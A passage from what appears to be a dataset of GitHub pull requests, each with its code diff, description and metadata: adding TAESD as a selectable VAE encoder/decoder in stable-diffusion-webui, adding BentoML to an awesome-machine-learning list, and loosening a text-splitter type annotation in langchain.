+ p.extra_generation_params['VAE Decoder'] = opts.sd_vae_decode_method
x_samples_ddim = decode_latent_batch(p.sd_model, samples_ddim, target_device=devices.cpu, check_for_nans=True)
x_samples_ddim = torch.stack(x_samples_ddim).float()
@@ -1135,11 +1136,10 @@ def save_intermediate(image, index):
batch_images.append(image)
decoded_samples = torch.from_numpy(np.array(batch_images))
- decoded_samples = decoded_samples.to(shared.device)
- decoded_samples = 2. * decoded_samples - 1.
decoded_samples = decoded_samples.to(shared.device, dtype=devices.dtype_vae)
- samples = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(decoded_samples))
+ self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
+ samples = images_tensor_to_samples(decoded_samples, approximation_indexes.get(opts.sd_vae_encode_method))
image_conditioning = self.img2img_image_conditioning(decoded_samples, samples)
@@ -1374,10 +1374,9 @@ def init(self, all_prompts, all_seeds, all_subseeds):
raise RuntimeError(f"bad number of images passed: {len(imgs)}; expecting {self.batch_size} or less")
image = torch.from_numpy(batch_images)
- image = 2. * image - 1.
image = image.to(shared.device, dtype=devices.dtype_vae)
-
- self.init_latent = self.sd_model.get_first_stage_encoding(self.sd_model.encode_first_stage(image))
+ self.extra_generation_params['VAE Encoder'] = opts.sd_vae_encode_method
+ self.init_latent = images_tensor_to_samples(image, approximation_indexes.get(opts.sd_vae_encode_method), self.sd_model)
devices.torch_gc()
if self.resize_mode == 3:
diff --git a/modules/sd_samplers_common.py b/modules/sd_samplers_common.py
index b3d344e777b..42a29fc9c95 100644
--- a/modules/sd_samplers_common.py
+++ b/modules/sd_samplers_common.py
@@ -23,19 +23,29 @@ def setup_img2img_steps(p, steps=None):
approximation_indexes = {"Full": 0, "Approx NN": 1, "Approx cheap": 2, "TAESD": 3}
-def single_sample_to_image(sample, approximation=None):
+def samples_to_images_tensor(sample, approximation=None, model=None):
+ '''latents -> images [-1, 1]'''
if approximation is None:
approximation = approximation_indexes.get(opts.show_progress_type, 0)
if approximation == 2:
- x_sample = sd_vae_approx.cheap_approximation(sample) * 0.5 + 0.5
+ x_sample = sd_vae_approx.cheap_approximation(sample)
elif approximation == 1:
- x_sample = sd_vae_approx.model()(sample.to(devices.device, devices.dtype).unsqueeze(0))[0].detach() * 0.5 + 0.5
+ x_sample = sd_vae_approx.model()(sample.to(devices.device, devices.dtype)).detach()
elif approximation == 3:
x_sample = sample * 1.5
- x_sample = sd_vae_taesd.model()(x_sample.to(devices.device, devices.dtype).unsqueeze(0))[0].detach()
+ x_sample = sd_vae_taesd.decoder_model()(x_sample.to(devices.device, devices.dtype)).detach()
+ x_sample = x_sample * 2 - 1
else:
- x_sample = decode_first_stage(shared.sd_model, sample.unsqueeze(0))[0] * 0.5 + 0.5
+ if model is None:
+ model = shared.sd_model
+ x_sample = model.decode_first_stage(sample)
+
+ return x_sample
+
+
+def single_sample_to_image(sample, approximation=None):
+ x_sample = samples_to_images_tensor(sample.unsqueeze(0), approximation)[0] * 0.5 + 0.5
x_sample = torch.clamp(x_sample, min=0.0, max=1.0)
x_sample = 255. * np.moveaxis(x_sample.cpu().numpy(), 0, 2)
@@ -45,9 +55,9 @@ def single_sample_to_image(sample, approximation=None):
def decode_first_stage(model, x):
- x = model.decode_first_stage(x.to(devices.dtype_vae))
-
- return x
+ x = x.to(devices.dtype_vae)
+ approx_index = approximation_indexes.get(opts.sd_vae_decode_method, 0)
+ return samples_to_images_tensor(x, approx_index, model)
def sample_to_image(samples, index=0, approximation=None):
@@ -58,6 +68,24 @@ def samples_to_image_grid(samples, approximation=None):
return images.image_grid([single_sample_to_image(sample, approximation) for sample in samples])
+def images_tensor_to_samples(image, approximation=None, model=None):
+ '''image[0, 1] -> latent'''
+ if approximation is None:
+ approximation = approximation_indexes.get(opts.sd_vae_encode_method, 0)
+
+ if approximation == 3:
+ image = image.to(devices.device, devices.dtype)
+ x_latent = sd_vae_taesd.encoder_model()(image)
+ else:
+ if model is None:
+ model = shared.sd_model
+ image = image.to(shared.device, dtype=devices.dtype_vae)
+ image = image * 2 - 1
+ x_latent = model.get_first_stage_encoding(model.encode_first_stage(image))
+
+ return x_latent
+
+
def store_latent(decoded):
state.current_latent = decoded
diff --git a/modules/sd_vae_approx.py b/modules/sd_vae_approx.py
index 86bd658ad32..3965e223e6f 100644
--- a/modules/sd_vae_approx.py
+++ b/modules/sd_vae_approx.py
@@ -81,6 +81,6 @@ def cheap_approximation(sample):
coefs = torch.tensor(coeffs).to(sample.device)
- x_sample = torch.einsum("lxy,lr -> rxy", sample, coefs)
+ x_sample = torch.einsum("...lxy,lr -> ...rxy", sample, coefs)
return x_sample
diff --git a/modules/sd_vae_taesd.py b/modules/sd_vae_taesd.py
index 5bf7c76e1dd..808eb3624fd 100644
--- a/modules/sd_vae_taesd.py
+++ b/modules/sd_vae_taesd.py
@@ -44,7 +44,17 @@ def decoder():
)
-class TAESD(nn.Module):
+def encoder():
+ return nn.Sequential(
+ conv(3, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 64, stride=2, bias=False), Block(64, 64), Block(64, 64), Block(64, 64),
+ conv(64, 4),
+ )
+
+
+class TAESDDecoder(nn.Module):
latent_magnitude = 3
latent_shift = 0.5
@@ -55,21 +65,28 @@ def __init__(self, decoder_path="taesd_decoder.pth"):
self.decoder.load_state_dict(
torch.load(decoder_path, map_location='cpu' if devices.device.type != 'cuda' else None))
- @staticmethod
- def unscale_latents(x):
- """[0, 1] -> raw latents"""
- return x.sub(TAESD.latent_shift).mul(2 * TAESD.latent_magnitude)
+
+class TAESDEncoder(nn.Module):
+ latent_magnitude = 3
+ latent_shift = 0.5
+
+ def __init__(self, encoder_path="taesd_encoder.pth"):
+ """Initialize pretrained TAESD on the given device from the given checkpoints."""
+ super().__init__()
+ self.encoder = encoder()
+ self.encoder.load_state_dict(
+ torch.load(encoder_path, map_location='cpu' if devices.device.type != 'cuda' else None))
def download_model(model_path, model_url):
if not os.path.exists(model_path):
os.makedirs(os.path.dirname(model_path), exist_ok=True)
- print(f'Downloading TAESD decoder to: {model_path}')
+ print(f'Downloading TAESD model to: {model_path}')
torch.hub.download_url_to_file(model_url, model_path)
-def model():
+def decoder_model():
model_name = "taesdxl_decoder.pth" if getattr(shared.sd_model, 'is_sdxl', False) else "taesd_decoder.pth"
loaded_model = sd_vae_taesd_models.get(model_name)
@@ -78,7 +95,7 @@ def model():
download_model(model_path, 'https://github.com/madebyollin/taesd/raw/main/' + model_name)
if os.path.exists(model_path):
- loaded_model = TAESD(model_path)
+ loaded_model = TAESDDecoder(model_path)
loaded_model.eval()
loaded_model.to(devices.device, devices.dtype)
sd_vae_taesd_models[model_name] = loaded_model
@@ -86,3 +103,22 @@ def model():
raise FileNotFoundError('TAESD model not found')
return loaded_model.decoder
+
+
+def encoder_model():
+ model_name = "taesdxl_encoder.pth" if getattr(shared.sd_model, 'is_sdxl', False) else "taesd_encoder.pth"
+ loaded_model = sd_vae_taesd_models.get(model_name)
+
+ if loaded_model is None:
+ model_path = os.path.join(paths_internal.models_path, "VAE-taesd", model_name)
+ download_model(model_path, 'https://github.com/madebyollin/taesd/raw/main/' + model_name)
+
+ if os.path.exists(model_path):
+ loaded_model = TAESDEncoder(model_path)
+ loaded_model.eval()
+ loaded_model.to(devices.device, devices.dtype)
+ sd_vae_taesd_models[model_name] = loaded_model
+ else:
+ raise FileNotFoundError('TAESD model not found')
+
+ return loaded_model.encoder
diff --git a/modules/shared.py b/modules/shared.py
index 8245250a5a2..516ad7e8052 100644
--- a/modules/shared.py
+++ b/modules/shared.py
@@ -435,6 +435,8 @@ def list_samplers():
"upcast_attn": OptionInfo(False, "Upcast cross attention layer to float32"),
"auto_vae_precision": OptionInfo(True, "Automaticlly revert VAE to 32-bit floats").info("triggers when a tensor with NaNs is produced in VAE; disabling the option in this case will result in a black square image"),
"randn_source": OptionInfo("GPU", "Random number generator source.", gr.Radio, {"choices": ["GPU", "CPU", "NV"]}).info("changes seeds drastically; use CPU to produce the same picture across different videocard vendors; use NV to produce same picture as on NVidia videocards"),
+ "sd_vae_encode_method": OptionInfo("Full", "VAE type for encode", gr.Radio, {"choices": ["Full", "TAESD"]}).info("method to encode image to latent (use in img2img, hires-fix or inpaint mask)"),
+ "sd_vae_decode_method": OptionInfo("Full", "VAE type for decode", gr.Radio, {"choices": ["Full", "TAESD"]}).info("method to decode latent to image"),
}))
options_templates.update(options_section(('sdxl', "Stable Diffusion XL"), {
| ## Description
TAESD has already been added as a fast live-preview method, and it can actually be used as a normal VAE (with some quality degradation).
Since some users may prefer faster speed, or want to generate larger images with limited VRAM, I think adding TAESD as a usable method for all the VAE operations is a good idea, so I opened this PR.
At first I only implemented the TAESD encoder and replaced all the latent encode/decode calls in processing.py. I think tiled VAE could also be offered as a built-in VAE method.
(For example: t2i -> Full decode -> img -> TAESD encode -> i2i -> Tiled decode -> final big image)
I will leave this PR as a draft to see whether we should implement everything mentioned here (second-pass VAE, built-in tiled VAE, etc.). A rough sketch of how the new helpers route between VAE types is below.
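Roughly how the new helpers are meant to be driven by the two options added in shared.py (illustrative only, not a snippet copied from this patch; the `encode`/`decode` wrapper names are made up):

```
from modules import shared
from modules.sd_samplers_common import (
    approximation_indexes,
    images_tensor_to_samples,
    samples_to_images_tensor,
)

def encode(image_01):
    # image_01 is an image tensor in [0, 1]; "Full" -> checkpoint VAE, "TAESD" -> tiny AE
    index = approximation_indexes.get(shared.opts.sd_vae_encode_method)
    return images_tensor_to_samples(image_01, index)

def decode(latent):
    index = approximation_indexes.get(shared.opts.sd_vae_decode_method)
    # samples_to_images_tensor returns values in [-1, 1]; rescale back to [0, 1]
    return samples_to_images_tensor(latent, index) * 0.5 + 0.5
```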
## Some examples of TAESD encode/decode
Full VAE vs TAESD
![vae_compare_2](https://github.com/AUTOMATIC1111/stable-diffusion-webui/assets/59680068/075caaa3-0a6c-447d-8ba3-5c24700bee16)
4K image generated with the example workflow above on an SD1.5 model (takes 8 GB VRAM for the whole process):
(t2i 1024x576, hires fix to 3840x2160)
![00571](https://github.com/AUTOMATIC1111/stable-diffusion-webui/assets/59680068/d349db50-67b4-435f-b325-93aa41d08e16)
## Checklist:
- [x] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [x] I have performed a self-review of my own code
- [x] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [x] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/12311 | 2023-08-04T11:08:11Z | 2023-08-05T06:24:26Z | 2023-08-05T06:24:26Z | 2023-09-04T21:36:50Z | 3,657 | AUTOMATIC1111/stable-diffusion-webui | 39,713 |
Add bentoML for python general purpose section | diff --git a/README.md b/README.md
index 46368eb6..8ed71fbc 100644
--- a/README.md
+++ b/README.md
@@ -1010,6 +1010,7 @@ be
* [Gorgonia](https://github.com/gorgonia/gorgonia) - Gorgonia is a library that helps facilitate machine learning in Golang.
* [Microsoft Recommenders](https://github.com/Microsoft/Recommenders): Examples and best practices for building recommendation systems, provided as Jupyter notebooks. The repo contains some of the latest state of the art algorithms from Microsoft Research as well as from other companies and institutions.
* [StellarGraph](https://github.com/stellargraph/stellargraph): Machine Learning on Graphs, a Python library for machine learning on graph-structured (network-structured) data.
+* [BentoML](https://github.com/bentoml/bentoml): Toolkit for package and deploy machine learning models for serving in production
<a name="python-data-analysis"></a>
#### Data Analysis / Data Visualization
| Hi @josephmisiti
Thank you for putting together this awesome list. I would like to add BentoML to Python's general purpose ML section. It is a toolkit that packages and deploys models to production.
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/601 | 2019-04-15T18:47:41Z | 2019-04-15T19:24:23Z | 2019-04-15T19:24:23Z | 2019-04-15T19:24:23Z | 236 | josephmisiti/awesome-machine-learning | 52,033 |
Fix typing in WebResearchRetriver | diff --git a/libs/langchain/langchain/retrievers/web_research.py b/libs/langchain/langchain/retrievers/web_research.py
index e8e96a2abccc75..cf53243c66b797 100644
--- a/libs/langchain/langchain/retrievers/web_research.py
+++ b/libs/langchain/langchain/retrievers/web_research.py
@@ -16,7 +16,7 @@
from langchain.prompts import BasePromptTemplate, PromptTemplate
from langchain.pydantic_v1 import BaseModel, Field
from langchain.schema import BaseRetriever, Document
-from langchain.text_splitter import RecursiveCharacterTextSplitter
+from langchain.text_splitter import RecursiveCharacterTextSplitter, TextSplitter
from langchain.utilities import GoogleSearchAPIWrapper
from langchain.vectorstores.base import VectorStore
@@ -75,7 +75,7 @@ class WebResearchRetriever(BaseRetriever):
llm_chain: LLMChain
search: GoogleSearchAPIWrapper = Field(..., description="Google Search API Wrapper")
num_search_results: int = Field(1, description="Number of pages per Google search")
- text_splitter: RecursiveCharacterTextSplitter = Field(
+ text_splitter: TextSplitter = Field(
RecursiveCharacterTextSplitter(chunk_size=1500, chunk_overlap=50),
description="Text splitter for splitting web pages into chunks",
)
| Hello @hwchase17
**Issue**:
The class WebResearchRetriever accepts only RecursiveCharacterTextSplitter for its text splitter, but never uses anything specific to that subclass. I propose changing the annotated type to TextSplitter; type checking can then accept all subtypes. A short sketch of what this allows is below.
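A minimal sketch of what this allows (illustrative only; it assumes `vectorstore` and `llm_chain` are configured elsewhere, and the field names are taken from the class definition in this module):

```
from langchain.retrievers.web_research import WebResearchRetriever
from langchain.text_splitter import CharacterTextSplitter
from langchain.utilities import GoogleSearchAPIWrapper

retriever = WebResearchRetriever(
    vectorstore=vectorstore,   # any VectorStore instance, set up elsewhere
    llm_chain=llm_chain,       # the question-generation LLMChain, set up elsewhere
    search=GoogleSearchAPIWrapper(),
    # any TextSplitter subclass now passes validation, not only
    # RecursiveCharacterTextSplitter:
    text_splitter=CharacterTextSplitter(chunk_size=1500, chunk_overlap=50),
)
```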
| https://api.github.com/repos/langchain-ai/langchain/pulls/10734 | 2023-09-18T11:48:54Z | 2023-09-18T15:17:11Z | 2023-09-18T15:17:11Z | 2023-09-18T15:17:11Z | 307 | langchain-ai/langchain | 43,136 |